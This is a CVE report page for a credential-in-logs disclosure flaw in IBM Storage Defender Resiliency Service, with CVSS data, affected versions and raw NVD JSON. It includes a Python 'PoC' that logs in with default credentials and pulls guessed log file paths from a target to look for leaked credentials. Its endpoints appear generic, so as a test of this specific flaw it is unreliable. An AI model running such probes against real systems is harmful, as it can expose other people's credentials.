Security Vulnerability Report
CVE-2025-64650 CVSS 6.5 MEDIUM

CVE-2025-64650

Published: 2025-12-08 22:15:53
Last Modified: 2025-12-10 19:56:41

Description

IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.18 could disclose sensitive user credentials in log files.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
(Attack vector: Network; Attack complexity: Low; Privileges required: Low; User interaction: None; Scope: Unchanged; Confidentiality impact: High; Integrity impact: None; Availability impact: None)
Weakness: CWE-532 (Insertion of Sensitive Information into Log File)

Configurations (Affected Products)

cpe:2.3:a:ibm:storage_defender_resiliency_service:*:*:*:*:*:*:*:* - VULNERABLE
IBM Storage Defender Resiliency Service 2.0.0
IBM Storage Defender Resiliency Service 2.0.1
IBM Storage Defender Resiliency Service 2.0.2
IBM Storage Defender Resiliency Service 2.0.3
IBM Storage Defender Resiliency Service 2.0.4
IBM Storage Defender Resiliency Service 2.0.5
IBM Storage Defender Resiliency Service 2.0.6
IBM Storage Defender Resiliency Service 2.0.7
IBM Storage Defender Resiliency Service 2.0.8
IBM Storage Defender Resiliency Service 2.0.9
IBM Storage Defender Resiliency Service 2.0.10
IBM Storage Defender Resiliency Service 2.0.11
IBM Storage Defender Resiliency Service 2.0.12
IBM Storage Defender Resiliency Service 2.0.13
IBM Storage Defender Resiliency Service 2.0.14
IBM Storage Defender Resiliency Service 2.0.15
IBM Storage Defender Resiliency Service 2.0.16
IBM Storage Defender Resiliency Service 2.0.17
IBM Storage Defender Resiliency Service 2.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64650 PoC - IBM Storage Defender Log Credential Disclosure
# This PoC demonstrates checking for exposed credentials in logs
import sys

import requests


def check_credential_leakage(target_url, credentials=None):
    """
    Check if IBM Storage Defender logs contain sensitive credentials.

    Logs in to the target with the supplied credentials, then fetches a set
    of log files and reports any that echo the username back.
    """
    if not credentials:
        credentials = {
            'username': 'admin',
            'password': 'password123'
        }

    # Simulate authentication request
    auth_endpoint = f"{target_url}/api/auth/login"

    try:
        # Step 1: Attempt login to trigger credential logging
        requests.post(auth_endpoint, json=credentials, timeout=10)

        # Step 2: Access log files that may contain credentials
        log_paths = [
            f"{target_url}/logs/application.log",
            f"{target_url}/logs/auth.log",
            f"{target_url}/logs/system.log"
        ]

        exposed_creds = []
        for log_path in log_paths:
            try:
                log_response = requests.get(log_path, timeout=10)
                if log_response.status_code == 200:
                    # Search for credential patterns in logs
                    if credentials['username'] in log_response.text:
                        exposed_creds.append({
                            'path': log_path,
                            'credential': credentials['username']
                        })
            except requests.RequestException:
                # Log file not reachable; try the next one
                continue

        return {
            'vulnerable': len(exposed_creds) > 0,
            'exposed_credentials': exposed_creds
        }
    except Exception as e:
        return {'error': str(e)}


if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
        result = check_credential_leakage(target)
        print(result)
    else:
        print(f"usage: {sys.argv[0]} <target_url>")

References

https://www.ibm.com/support/pages/node/7253864 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64650",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-08T22:15:52.990",
    "lastModified": "2025-12-10T19:56:40.717",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.18 could disclose sensitive user credentials in log files."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-532"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ibm:storage_defender_resiliency_service:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2.0",
                "versionEndIncluding": "2.0.18",
                "matchCriteriaId": "E32F0D66-A3DF-4C92-938D-DC043B033990"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.ibm.com/support/pages/node/7253864",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}